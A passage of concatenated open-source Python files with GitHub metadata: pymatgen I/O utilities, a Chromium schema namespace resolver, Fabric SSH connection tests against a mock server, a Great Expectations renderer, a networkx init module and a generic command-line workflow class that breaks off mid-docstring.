"name": "Python",
"bytes": "19408"
}
],
"symlink_target": ""
}
|
"""
This module provides utility classes for io operations.
"""
import codecs
import errno
import os
import re
import tempfile
from monty.io import zopen
__author__ = "Shyue Ping Ong, Rickard Armiento, Anubhav Jain, G Matteo, Ioannis Petousis"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__status__ = "Production"
__date__ = "Sep 23, 2011"
def ask_yesno(question, default=True):
"""
Args:
question ():
default ():
Returns:
"""
try:
answer = input(question)
return answer.lower().strip() in ["y", "yes"]
except EOFError:
return default
def clean_lines(string_list, remove_empty_lines=True):
"""
Strips whitespace, carriage returns and empty lines from a list of strings.
Args:
string_list: List of strings
remove_empty_lines: Set to True to skip lines which are empty after
stripping.
Returns:
List of clean strings with no whitespaces.
"""
for s in string_list:
clean_s = s
if "#" in s:
ind = s.index("#")
clean_s = s[:ind]
clean_s = clean_s.strip()
if (not remove_empty_lines) or clean_s != "":
yield clean_s
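# For example (hypothetical input): list(clean_lines(["  a  ", "", "b # note"]))
# yields ["a", "b"]; the trailing comment and the empty line are stripped.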
def micro_pyawk(filename, search, results=None, debug=None, postdebug=None):
"""
Small awk-mimicking search routine.
'file' is file to search through.
'search' is the "search program", a list of lists/tuples with 3 elements;
i.e. [[regex,test,run],[regex,test,run],...]
    'results' is an object that your search program will have access to for
    storing results.
Here regex is either as a Regex object, or a string that we compile into a
Regex. test and run are callable objects.
This function goes through each line in filename, and if regex matches that
line *and* test(results,line)==True (or test is None) we execute
run(results,match),where match is the match object from running
Regex.match.
    The default results is an empty dictionary. Passing a results object lets
    you interact with it in run() and test(). Hence, on many occasions it is
    convenient to use results=self.
Author: Rickard Armiento, Ioannis Petousis
Returns:
results
"""
if results is None:
results = {}
# Compile strings into regexs
for entry in search:
entry[0] = re.compile(entry[0])
with zopen(filename, "rt") as f:
for line in f:
for entry in search:
match = re.search(entry[0], line)
if match and (entry[1] is None or entry[1](results, line)):
if debug is not None:
debug(results, match)
entry[2](results, match)
if postdebug is not None:
postdebug(results, match)
return results
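# A minimal micro_pyawk sketch (hypothetical): collect every "ERROR: ..."
# message from a log file into results["errors"]:
#   search = [["ERROR: (.*)", None,
#              lambda results, match: results.setdefault(
#                  "errors", []).append(match.group(1))]]
#   results = micro_pyawk("run.log", search)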
umask = os.umask(0)
os.umask(umask)
def _maketemp(name, createmode=None):
"""
Create a temporary file with the filename similar the given ``name``.
The permission bits are copied from the original file or ``createmode``.
Returns: the name of the temporary file.
"""
d, fn = os.path.split(name)
fd, tempname = tempfile.mkstemp(prefix=f".{fn}-", dir=d)
os.close(fd)
# Temporary files are created with mode 0600, which is usually not
# what we want. If the original file already exists, just copy its mode.
# Otherwise, manually obey umask.
try:
st_mode = os.lstat(name).st_mode & 0o777
except OSError as err:
if err.errno != errno.ENOENT:
raise
st_mode = createmode
if st_mode is None:
st_mode = ~umask
st_mode &= 0o666
os.chmod(tempname, st_mode)
return tempname
class AtomicFile:
"""
This is a straight port of Alexander Saltanov's atomicfile package.
Writeable file object that atomically writes a file.
All writes will go to a temporary file.
Call ``close()`` when you are done writing, and AtomicFile will rename
the temporary copy to the original name, making the changes visible.
If the object is destroyed without being closed, all your writes are
discarded.
If an ``encoding`` argument is specified, codecs.open will be called to open
the file in the wanted encoding.
"""
def __init__(self, name, mode="w+b", createmode=None, encoding=None):
"""
Args:
name ():
mode ():
createmode ():
encoding ():
"""
self.__name = name # permanent name
self._tempname = _maketemp(name, createmode=createmode)
if encoding:
self._fp = codecs.open(self._tempname, mode, encoding) # pylint: disable=R1732
else:
self._fp = open(self._tempname, mode) # pylint: disable=R1732
# delegated methods
self.write = self._fp.write
self.fileno = self._fp.fileno
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
if exc_type:
return
self.close()
def close(self):
"""
Close the file.
"""
if not self._fp.closed:
self._fp.close()
# This is to avoid:
# FileExistsError: [WinError 183] Cannot create a file when that file already exists:
# On Windows, if dst already exists, OSError will be raised even if it is a file;
# there may be no way to implement an atomic rename when dst names an existing file.
if os.name == "nt" and os.path.exists(self.__name):
os.remove(self.__name)
os.rename(self._tempname, self.__name)
def discard(self):
"""
Discard the file.
"""
if not self._fp.closed:
try:
os.unlink(self._tempname)
except OSError:
pass
self._fp.close()
def __del__(self):
if getattr(self, "_fp", None): # constructor actually did something
self.discard()
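# Illustrative usage (editor's sketch, not part of the original module):
#
#   with AtomicFile("settings.cfg", mode="w", encoding="utf-8") as f:
#       f.write("key = value\n")
#
# On a clean exit the temporary file is atomically renamed to "settings.cfg";
# if an exception escapes the block, close() is skipped and the partially
# written temporary file is discarded when the object is garbage-collected.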
|
{
"content_hash": "0e7ffdb1107864b422fc8bef6a63e127",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 99,
"avg_line_length": 29.526315789473685,
"alnum_prop": 0.5935828877005348,
"repo_name": "fraricci/pymatgen",
"id": "681a90de149016a256442d9b0a02c2ae81a2b827",
"size": "6265",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "pymatgen/util/io_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "87"
},
{
"name": "CSS",
"bytes": "7572"
},
{
"name": "Cython",
"bytes": "38793"
},
{
"name": "HTML",
"bytes": "12642493"
},
{
"name": "OpenEdge ABL",
"bytes": "312"
},
{
"name": "Python",
"bytes": "9195124"
},
{
"name": "Roff",
"bytes": "1407429"
},
{
"name": "Shell",
"bytes": "12027"
}
],
"symlink_target": ""
}
|
from fields.jsonf import JSONField, JSONCharField
|
{
"content_hash": "d0f304bfe5721e4b7d178320edcd4012",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 49,
"avg_line_length": 50,
"alnum_prop": 0.86,
"repo_name": "williamroot/opps",
"id": "75747f61b28644c62d460c08c58f7aac57658658",
"size": "96",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "opps/db/models/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "13004"
},
{
"name": "HTML",
"bytes": "56927"
},
{
"name": "JavaScript",
"bytes": "62514"
},
{
"name": "Makefile",
"bytes": "848"
},
{
"name": "Python",
"bytes": "1387220"
},
{
"name": "Shell",
"bytes": "661"
}
],
"symlink_target": ""
}
|
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
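# Illustrative example (editor's note, not part of the original tool): assuming
# UnixName('nameSpace.sub_name_space') == 'name_space_sub_name_space',
# _GenerateFilenames('nameSpace.sub_name_space') would return
#   ['sub_name_space.json', 'sub_name_space.idl',
#    'name_space_sub_name_space.json', 'name_space_sub_name_space.idl']
# ResolveNamespace() below probes these in reverse order, so the most fully
# qualified candidates are checked first.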
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename)
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
|
{
"content_hash": "da866b6e80a1bb39639adc5d793f5500",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 79,
"avg_line_length": 37.04054054054054,
"alnum_prop": 0.6833272528274352,
"repo_name": "endlessm/chromium-browser",
"id": "6387c807a0506877d4713238654561e63fa07a0c",
"size": "2904",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tools/json_schema_compiler/namespace_resolver.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from __future__ import with_statement
import sys
import paramiko
from fudge import Fake, patch_object, with_fakes
from fabric.context_managers import settings, hide, show
from fabric.network import (HostConnectionCache, join_host_strings, normalize,
denormalize)
import fabric.network # So I can call patch_object correctly. Sigh.
from fabric.state import env, output, _get_system_username
from fabric.operations import run, sudo
from utils import *
from server import (server, PORT, RESPONSES, PASSWORDS, CLIENT_PRIVKEY, USER,
CLIENT_PRIVKEY_PASSPHRASE)
#
# Subroutines, e.g. host string normalization
#
class TestNetwork(FabricTest):
def test_host_string_normalization(self):
username = _get_system_username()
for description, input, output_ in (
("Sanity check: equal strings remain equal",
'localhost', 'localhost'),
("Empty username is same as get_system_username",
'localhost', username + '@localhost'),
("Empty port is same as port 22",
'localhost', 'localhost:22'),
("Both username and port tested at once, for kicks",
'localhost', username + '@localhost:22'),
):
eq_.description = "Host-string normalization: %s" % description
yield eq_, normalize(input), normalize(output_)
del eq_.description
def test_normalization_without_port(self):
"""
normalize() and join_host_strings() omit port if omit_port given
"""
eq_(
join_host_strings(*normalize('user@localhost', omit_port=True)),
'user@localhost'
)
def test_nonword_character_in_username(self):
"""
normalize() will accept non-word characters in the username part
"""
eq_(
normalize('user-with-hyphens@someserver.org')[0],
'user-with-hyphens'
)
def test_normalization_of_empty_input(self):
empties = ('', '', '')
for description, input in (
("empty string", ''),
("None", None)
):
template = "normalize() returns empty strings for %s input"
eq_.description = template % description
yield eq_, normalize(input), empties
del eq_.description
def test_host_string_denormalization(self):
username = _get_system_username()
for description, string1, string2 in (
("Sanity check: equal strings remain equal",
'localhost', 'localhost'),
("Empty username is same as get_system_username",
'localhost:22', username + '@localhost:22'),
("Empty port is same as port 22",
'user@localhost', 'user@localhost:22'),
("Both username and port",
'localhost', username + '@localhost:22'),
):
eq_.description = "Host-string denormalization: %s" % description
yield eq_, denormalize(string1), denormalize(string2)
del eq_.description
#
# Connection caching
#
@staticmethod
@with_fakes
def check_connection_calls(host_strings, num_calls):
# Clear Fudge call stack
# Patch connect() with Fake obj set to expect num_calls calls
patched_connect = patch_object('fabric.network', 'connect',
Fake('connect', expect_call=True).times_called(num_calls)
)
try:
# Make new cache object
cache = HostConnectionCache()
# Connect to all connection strings
for host_string in host_strings:
# Obtain connection from cache, potentially calling connect()
cache[host_string]
finally:
# Restore connect()
patched_connect.restore()
def test_connection_caching(self):
for description, host_strings, num_calls in (
("Two different host names, two connections",
('localhost', 'other-system'), 2),
("Same host twice, one connection",
('localhost', 'localhost'), 1),
("Same host twice, different ports, two connections",
('localhost:22', 'localhost:222'), 2),
("Same host twice, different users, two connections",
('user1@localhost', 'user2@localhost'), 2),
):
TestNetwork.check_connection_calls.description = description
yield TestNetwork.check_connection_calls, host_strings, num_calls
#
# Connection loop flow
#
@server()
def test_saved_authentication_returns_client_object(self):
cache = HostConnectionCache()
assert isinstance(cache[env.host_string], paramiko.SSHClient)
@server()
@with_fakes
def test_prompts_for_password_without_good_authentication(self):
env.password = None
with password_response(PASSWORDS[env.user], times_called=1):
cache = HostConnectionCache()
cache[env.host_string]
@mock_streams('stdout')
@server()
def test_trailing_newline_line_drop(self):
"""
Trailing newlines shouldn't cause last line to be dropped.
"""
# Multiline output with trailing newline
cmd = "ls /"
output_string = RESPONSES[cmd]
# TODO: fix below lines, duplicates inner workings of tested code
prefix = "[%s] out: " % env.host_string
expected = prefix + ('\n' + prefix).join(output_string.split('\n'))
# Create, tie off thread
with settings(show('everything'), hide('running')):
result = run(cmd)
# Test equivalence of expected, received output
eq_(expected, sys.stdout.getvalue())
# Also test that the captured value matches, too.
eq_(output_string, result)
@server()
def test_sudo_prompt_kills_capturing(self):
"""
Sudo prompts shouldn't screw up output capturing
"""
cmd = "ls /simple"
with hide('everything'):
eq_(sudo(cmd), RESPONSES[cmd])
@server()
def test_password_memory_on_user_switch(self):
"""
Switching users mid-session should not screw up password memory
"""
def _to_user(user):
return join_host_strings(user, env.host, env.port)
user1 = 'root'
user2 = USER
with settings(hide('everything'), password=None):
# Connect as user1 (thus populating both the fallback and
# user-specific caches)
with settings(
password_response(PASSWORDS[user1]),
host_string=_to_user(user1)
):
run("ls /simple")
# Connect as user2:
# * First cxn attempt will use fallback cache, which contains user1's
#   password, and thus fail
# * Second cxn attempt will prompt user, and succeed due to mocked p4p
# * but will NOT overwrite fallback cache
with settings(
password_response(PASSWORDS[user2]),
host_string=_to_user(user2)
):
# Just to trigger connection
run("ls /simple")
# * Sudo call should use cached user2 password, NOT fallback cache,
# and thus succeed. (I.e. p_f_p should NOT be called here.)
with settings(
password_response('whatever', times_called=0),
host_string=_to_user(user2)
):
sudo("ls /simple")
@mock_streams('stderr')
@server()
def test_password_prompt_displays_host_string(self):
"""
Password prompt lines should include the user/host in question
"""
env.password = None
env.no_agent = env.no_keys = True
output.everything = False
with password_response(PASSWORDS[env.user], silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password for user %s:' % (env.host_string, env.user)
assert_contains(regex, sys.stderr.getvalue())
@mock_streams('stderr')
@server(pubkeys=True)
def test_passphrase_prompt_displays_host_and_user_string(self):
"""
Passphrase prompt lines should include the host/usr in question
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.everything = False
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password for user %s:' % (env.host_string, env.user)
assert_contains(regex, sys.stderr.getvalue())
@mock_streams('stderr')
@server(pubkeys=True)
def test_passphrase_prompt_does_not_display_username_when_user_not_present(self):
"""
Passphrase prompt lines should not include the username when not set
"""
env.password = None
env.user = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.everything = False
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password: ' % env.host_string
assert_contains(regex, sys.stderr.getvalue())
def test_sudo_prompt_display_passthrough(self):
"""
Sudo prompt should display (via passthrough) when stdout/stderr shown
"""
TestNetwork._prompt_display(True)
def test_sudo_prompt_display_directly(self):
"""
Sudo prompt should display (manually) when stdout/stderr hidden
"""
TestNetwork._prompt_display(False)
@staticmethod
@mock_streams('both')
@server(pubkeys=True, responses={'oneliner': 'result'})
def _prompt_display(display_output):
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.output = display_output
with password_response(
(CLIENT_PRIVKEY_PASSPHRASE, PASSWORDS[env.user]),
silent=False
):
sudo('oneliner')
if display_output:
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: sudo password:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result
""" % {'prefix': env.host_string, 'user': env.user}
else:
# Note lack of first sudo prompt (as it's autoresponded to) and of
# course the actual result output.
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password: """ % {'prefix': env.host_string,
'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
@mock_streams('both')
@server(
pubkeys=True,
responses={'oneliner': 'result', 'twoliner': 'result1\nresult2'}
)
def test_consecutive_sudos_should_not_have_blank_line(self):
"""
Consecutive sudo() calls should not incur a blank line in-between
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
with password_response(
(CLIENT_PRIVKEY_PASSPHRASE, PASSWORDS[USER]),
silent=False
):
sudo('oneliner')
sudo('twoliner')
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: sudo password:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result
[%(prefix)s] sudo: twoliner
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result1
[%(prefix)s] out: result2
""" % {'prefix': env.host_string, 'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
@mock_streams('both')
@server(pubkeys=True, responses={'silent': '', 'normal': 'foo'})
def test_silent_commands_should_not_have_blank_line(self):
"""
Silent commands should not generate an extra trailing blank line
After the move to interactive I/O, it was noticed that while run/sudo
commands which had non-empty stdout worked normally (consecutive such
commands were totally adjacent), those with no stdout (i.e. silent
commands like ``test`` or ``mkdir``) resulted in spurious blank lines
after the "run:" line. This looks quite ugly in real world scripts.
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run('normal')
run('silent')
run('normal')
with hide('everything'):
run('normal')
run('silent')
expected = """
[%(prefix)s] run: normal
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: foo
[%(prefix)s] run: silent
[%(prefix)s] run: normal
[%(prefix)s] out: foo
""" % {'prefix': env.host_string, 'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
|
{
"content_hash": "fcb1528974448c5345873b75fc054536",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 90,
"avg_line_length": 35.79838709677419,
"alnum_prop": 0.5878200795975069,
"repo_name": "rsteckroth/TavFabric",
"id": "38addcea3ba17715944e383ecc1f3324fdc62c72",
"size": "13317",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_network.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "246989"
}
],
"symlink_target": ""
}
|
from great_expectations.expectations.registry import get_renderer_impl
from great_expectations.render import (
LegacyDescriptiveRendererType,
RenderedTableContent,
)
from great_expectations.render.renderer.content_block.content_block import (
ContentBlockRenderer,
)
class ProfilingColumnPropertiesTableContentBlockRenderer(ContentBlockRenderer):
expectation_renderers = {
"expect_column_values_to_not_match_regex": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_REGEX_COUNT_ROW
],
"expect_column_unique_value_count_to_be_between": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_DISTINCT_COUNT_ROW
],
"expect_column_proportion_of_unique_values_to_be_between": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_DISTINCT_PERCENT_ROW
],
"expect_column_values_to_not_be_null": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_MISSING_COUNT_ROW,
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_MISSING_PERCENT_ROW,
],
}
@classmethod
def render(cls, ge_object, header_row=None):
"""Each expectation method should return a list of rows"""
if header_row is None:
header_row = []
table_rows = []
if isinstance(ge_object, list):
for sub_object in ge_object:
expectation_type = cls._get_expectation_type(sub_object)
if expectation_type in cls.expectation_renderers:
new_rows = [
get_renderer_impl(expectation_type, renderer_type)[1](
result=sub_object
)
for renderer_type in cls.expectation_renderers.get(
expectation_type
)
]
table_rows.extend(new_rows)
else:
expectation_type = cls._get_expectation_type(ge_object)
if expectation_type in cls.expectation_renderers:
new_rows = [
get_renderer_impl(expectation_type, renderer_type)[1](
result=ge_object
)
for renderer_type in cls.expectation_renderers.get(expectation_type)
]
table_rows.extend(new_rows)
return RenderedTableContent(
**{
"content_block_type": "table",
"header_row": header_row,
"table": table_rows,
}
)
|
{
"content_hash": "03f5774bf6b4e0fdbccda19879ab8e97",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 88,
"avg_line_length": 39.45454545454545,
"alnum_prop": 0.5817972350230415,
"repo_name": "great-expectations/great_expectations",
"id": "590b4f9f0c735a71483fb3bc8deb7d8269a1fa25",
"size": "2604",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "great_expectations/render/renderer/content_block/profiling_column_properties_table_content_block.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "23771"
},
{
"name": "Dockerfile",
"bytes": "2388"
},
{
"name": "HTML",
"bytes": "27311"
},
{
"name": "JavaScript",
"bytes": "45960"
},
{
"name": "Jinja",
"bytes": "66650"
},
{
"name": "Jupyter Notebook",
"bytes": "816323"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "Makefile",
"bytes": "657"
},
{
"name": "Python",
"bytes": "15728777"
},
{
"name": "Shell",
"bytes": "2930"
}
],
"symlink_target": ""
}
|
from networkx.linalg.attrmatrix import *
import networkx.linalg.attrmatrix
from networkx.linalg.spectrum import *
import networkx.linalg.spectrum
from networkx.linalg.graphmatrix import *
import networkx.linalg.graphmatrix
from networkx.linalg.laplacianmatrix import *
import networkx.linalg.laplacianmatrix
from networkx.linalg.algebraicconnectivity import *
from networkx.linalg.modularitymatrix import *
import networkx.linalg.modularitymatrix
from networkx.linalg.bethehessianmatrix import *
import networkx.linalg.bethehessianmatrix
|
{
"content_hash": "f1a08dfe09839f90ca3f6113bddc9301",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 51,
"avg_line_length": 41.38461538461539,
"alnum_prop": 0.8643122676579925,
"repo_name": "sserrot/champion_relationships",
"id": "f09b4023b75ad0d60264270438ee61daf4054a37",
"size": "538",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/Lib/site-packages/networkx/linalg/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "128"
},
{
"name": "HTML",
"bytes": "18324224"
},
{
"name": "Jupyter Notebook",
"bytes": "9131072"
},
{
"name": "Python",
"bytes": "10702"
}
],
"symlink_target": ""
}
|
import sys, os
import subprocess as sub
import multiprocessing
import time
import datetime
import logging
from optparse import OptionParser, OptionGroup
import pos_common
import pos_wrappers
class generic_workflow(object):
"""
A generic command-line workflow class. A workflow should be understood as a
configurable pipeline with configurable execution settings.
The workflow / pipeline may consist of different stages, use a number of
different files, etc. The reason for this class is to use command-line tools
whose functionality cannot be achieved in any other way.
>>> options, args = generic_workflow.parseArgs()
>>> options.dryRun = True
>>> w = generic_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /dev/shm/generic_workflow_...
<BLANKLINE>
<BLANKLINE>
>>> w.execute(["some command", "another command"])
some command
another command
>>> w.execute(["a batch comprising only one command"])
a batch comprising only one command
>>> w.execute("Bad_usage")
B
a
d
_
u
s
a
g
e
You have to provide at least one argument:
>>> w.execute()
Traceback (most recent call last):
TypeError: execute() takes at least 2 arguments (1 given)
All arguments are mapped to strings
>>> w.execute(1)
1
>>> w.execute([1, 2.3, False, None])
1
2.3
False
None
# Now let's test the ability of the workflow to compress its own
# workflow directory.
>>> w.options.archiveWorkDir = "/some/directory/to/archive/stuff/"
>>> w._archive_workflow() #doctest: +ELLIPSIS
tar -cvvzf /some/directory/to/archive/stuff/generic_workflow_...tgz /dev/shm/generic_workflow_...
# Ok, let's remove the existing workflow object and create a new one with
# slightly more settings. First of all, these settings cause the workflow
# to use the local /tmp/ directory instead of the shared RAM memory of the
# system. Note that this is still a machine-local directory and is not
# shared between different execution nodes. This only replaces the
# /dev/shm/ with the /tmp/ directory and that's it.
# The next change is that the dry run option is actually turned off, so the
# commands will actually be executed, not only printed. This may cause a lot
# of mess - but hey - that's what you call testing!
>>> options, args = generic_workflow.parseArgs()
>>> options.disableSharedMemory = True
>>> options.dryRun = False
>>> options.cleanup = True
>>> options.archiveWorkDir = "/tmp/"
>>> w = generic_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /tmp/generic_workflow_...
<BLANKLINE>
<BLANKLINE>
# To test out the execution routines one has to actually execute some
# commands therefore below we execute a command which does not produce any
# output.
>>> w.execute(["sleep 1"]) == ('', '')
True
# Now we test the archiving and cleanup routines by manually executing the
# pre- and post-launch methods. In the meantime we want to test the archiving
# feature as well.
>>> w._pre_launch()
>>> w._post_launch() #doctest: +ELLIPSIS
Executing: tar -cvvzf /tmp/generic_workflow_....tgz /tmp/generic_workflow_...
...
Executing: rm -rfv /tmp/generic_workflow_...
removed `/tmp/generic_workflow_...'
removed directory: `/tmp/generic_workflow_...'
<BLANKLINE>
"""
# Define the name of the GNU parallel executable.
__PARALLEL_EXECUTABLE_NAME="parallel"
# _f is a dictionary holding definitions of files being a part of the
# workflow. The purpose of this dictionary is to be able to easily access
# and utilize filenames (from each stage of the workflow). You're gonna like
# it.
_f = {}
# Override this attribute in the inherited classes.
_usage = ""
# Just to avoid hardcoded strings further on
_DO_NOT_CREATE_WORKDIR = 'skip'
def __init__(self, options, args):
"""
:param options: Command line options
:type options: optparse.Values
:param args: Command line arguments
:type args: list
"""
self.options = options
self.args = args
# Just an alias that exposes the private attribute as a public one. May be
# changed in the future.
self.f = dict(self._f)
# Get number of cpus for parallel processing.
# The multiprocessing module is used to determine the number of cpus. This
# behavior can be overridden with the --cpuNo switch.
if not self.options.cpuNo:
self.options.cpuNo = multiprocessing.cpu_count()
self._initializeLogging()
self._initializeOptions()
self._validate_options()
self._initializeDirectories()
self._overrideDefaults()
def _initializeLogging(self):
"""
Seems to be self-explanatory - initializes the logging module using
either the default logging settings or customized logging settings
according to the provided command line parameters.
"""
pos_common.setup_logging(self.options.logFilename,
self.options.loglevel)
logging.debug("Logging module initialized. Saving to: %s, Loglevel: %s",
self.options.logFilename, self.options.loglevel)
# Assign the string that will identify all messages from this
# script
self._logger = logging.getLogger(self.__class__.__name__)
self._logger.info("%s workflow options:", self.__class__.__name__)
for k, v in self.options.__dict__.items():
self._logger.info("%s : %s", k, v)
def _initializeOptions(self):
"""
There is not much to process or initialize. Actually, only the job ID (if not
provided) is generated automatically.
"""
# What the heck is a "specimen ID"? It is supposed to be at least single
# value which will allow to assign an instance of the workflow to
# particual animal. When you have multiple animals they can get confused
# easily. In the future, specimen ID, will act as database ID for given
# specimen. Thus, it is hardcoded to not allow any computations without
# this ID. Simple as it is.
# We need to check if the GNU parallel of availeble. If it's not, we
# cannot perform parallel computations.
if not pos_common.which(self.__PARALLEL_EXECUTABLE_NAME) and\
self.options.cpuNo > 1:
self._logger.error("Parallel execution was selected but GNU parallel is not available!")
sys.exit(1)
# The job ID is another value used for accounting and managing. Opposite to the
# specimen ID, this one may not be explicitly stated. In that case, it
# is generated automatically based on the current date and PID.
if self.options.jobId is None:
self.options.jobId = self.__class__.__name__
self.options.jobId += datetime.datetime.now().strftime("_%Y-%m-%d-%H_%M-%S_")
self.options.jobId += str(os.getpid())
def _overrideDefaults(self):
"""
A generic function for altering configuration that was set with
default values. Should be reimplemented in subclasses.
"""
pass
def _validate_options(self):
"""
A generic command line options validation function. Should be customized
in subclasses. A lot of assertions are expected to be here!
"""
pass
def _initializeDirectories(self):
"""
"""
# The directories in the dictionary below are the potential working
# dirs for the workflow. The 'sharedbf' is used when a given machine
# has a ramdisk, otherwise 'tempbf'. These are the default locations for
# the workdir. Typically, the working directory location is a custom
# one.
_dirTemplates = {
'sharedbf': '/dev/shm/',
'tempbf' : '/tmp/'}
# Sometimes we just don't want to create any work_dir (e.g. our workflow
# is done without creating any files). When the 'workdir' command line
# parameter is set to 'skip', we just skip it. Anything that happens
# afterwards is the liability of the developer.
if self.options.workdir == self._DO_NOT_CREATE_WORKDIR:
return
# That's a clever idea: when one doesn't want (or cannot) use shared memory
# on a given machine, the regular /tmp/ directory is used to support the
# computations. The tmp directory can also be set manually to, e.g., a
# directory shared among the whole computer cluster.
if self.options.disableSharedMemory:
top_directory = _dirTemplates['tempbf']
else:
top_directory = _dirTemplates['sharedbf']
# If the working directory (the directory holding all the
# job's calculations) is not defined, we define it automatically
# When the working directory name IS provided we just use it.
if not self.options.workdir:
self.options.workdir =\
os.path.join(top_directory, self.options.jobId)
self._ensureDir(self.options.workdir)
# Assign path to work dir to all templates:
for k, v in self.f.iteritems():
v.job_dir = self.options.workdir
# And, as a last point, just create the directories.
dirs_to_create = list(set(map(lambda v: v.base_dir, self.f.itervalues())))
map(self._ensureDir, dirs_to_create)
def _ensureDir(self, path):
"""
Makes sure that the given directory exists and is available.
:param path: Location to be tested. Note that only directory names are
valid paths. Passing filenames will probably end badly...
:type path: str
"""
return pos_wrappers.mkdir_wrapper(dir_list=[path])()
def _rmdir(self, path):
"""
Removes the given location. Watch out, as files and/or directories are
removed recursively and irreversibly (as with the `rm -rfv` command).
:param path: Location to be removed.
:type path: str
"""
return pos_wrappers.rmdir_wrapper(dir_list=[path])()
@staticmethod
def _basename(path, withExtension=False):
return pos_common.get_basename(path, withExtension)
def execute(self, commands, parallel=True):
"""
One of the most important methods in the whole class. Executes the
workflow. The execution can be launched in parallel mode, and / or in
the 'dry run' mode. With the latter, the commands to be executed are
actually only printed. The 'dry run' mode is selected / deselected
using command line workflow settings.
:param commands: The commands to be executed
